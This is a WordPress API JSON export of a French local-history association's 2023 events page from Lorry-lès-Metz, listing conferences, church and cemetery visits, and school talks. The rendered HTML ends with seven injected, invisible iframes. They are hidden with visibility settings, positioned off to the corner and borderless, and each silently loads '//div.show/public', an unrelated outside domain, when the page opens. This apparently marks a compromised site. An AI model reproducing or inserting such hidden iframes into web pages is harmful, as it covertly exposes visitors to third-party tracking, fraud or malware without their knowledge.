{"id":6688,"date":"2023-04-13T15:43:52","date_gmt":"2023-04-13T13:43:52","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6688"},"modified":"2023-12-19T16:19:55","modified_gmt":"2023-12-19T15:19:55","slug":"2023-2","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6688","title":{"rendered":"2023"},"content":{"rendered":"<table style=\"width: 100.5%; height: 210px;\">\n<tbody>\n<tr>\n<td style=\"width: 25.0825%;\">17 novembre<\/td>\n<td style=\"width: 58.2508%;\">Conf\u00e9rence la Lorraine celtique<\/td>\n<td style=\"width: 16.3366%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7511\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 10px;\">\n<td style=\"width: 25.0825%; height: 10px;\">6 novembre<\/td>\n<td style=\"width: 58.2508%; height: 10px;\">Colloque<\/td>\n<td style=\"width: 16.3366%; height: 10px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7376\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png?_t=1702895928\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"width: 25.0825%; height: 25px;\">18 octobre<\/td>\n<td style=\"width: 58.2508%; height: 25px;\">Visite du cimeti\u00e8re isra\u00e9lite de Metz-Chambi\u00e8re<\/td>\n<td style=\"width: 16.3366%; height: 25px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7269\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"width: 25.0825%; height: 25px;\">11 octobre<\/td>\n<td style=\"width: 58.2508%; height: 25px;\">Visite de l&rsquo;\u00e9glise Sainte-S\u00e9gol\u00e8ne<\/td>\n<td style=\"width: 16.3366%; height: 25px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7226\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"width: 25.0825%; height: 25px;\">2 juin<\/td>\n<td style=\"width: 58.2508%; height: 25px;\">Visite du haut-fourneau d&rsquo;Uckange<\/td>\n<td style=\"width: 16.3366%; height: 25px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6999\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"width: 25.0825%; height: 25px;\">2 juin<\/td>\n<td style=\"width: 58.2508%; height: 25px;\">Jardin des Traces &#8211; Uckange<\/td>\n<td style=\"width: 16.3366%; height: 25px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7027\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"width: 25.0825%; height: 25px;\">4 mai<\/td>\n<td style=\"width: 58.2508%; height: 25px;\">Intervention en classe \u00e0 Lorry-l\u00e8s-Metz<\/td>\n<td style=\"width: 16.3366%; height: 25px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6864\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"width: 25.0825%; height: 25px;\">29 mars<\/td>\n<td style=\"width: 58.2508%; height: 25px;\">Visite de l\u2019\u00e9glise Sainte-Glossinde<\/td>\n<td style=\"width: 16.3366%; height: 25px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6694\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"width: 25.0825%; height: 25px;\">23 mars<\/td>\n<td style=\"width: 58.2508%; height: 25px;\">Intervention en classe \u00e0 Plappeville<\/td>\n<td style=\"width: 16.3366%; height: 25px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6692\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"width: 25.0825%; height: 25px;\">3 janvier<\/td>\n<td style=\"width: 58.2508%; height: 25px;\">F\u00eate des Rois<\/td>\n<td style=\"width: 16.3366%; height: 25px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6696\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=60\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-378 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/retour.png?_t=1648017499\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>17 novembre Conf\u00e9rence la Lorraine celtique 6 novembre Colloque 18 octobre Visite du cimeti\u00e8re isra\u00e9lite de Metz-Chambi\u00e8re 11 octobre Visite de l&rsquo;\u00e9glise Sainte-S\u00e9gol\u00e8ne 2 juin Visite du haut-fourneau d&rsquo;Uckange 2 juin Jardin des Traces &#8211; Uckange 4 mai Intervention en&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":60,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-6688","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6688","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6688"}],"version-history":[{"count":10,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6688\/revisions"}],"predecessor-version":[{"id":7515,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6688\/revisions\/7515"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/60"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}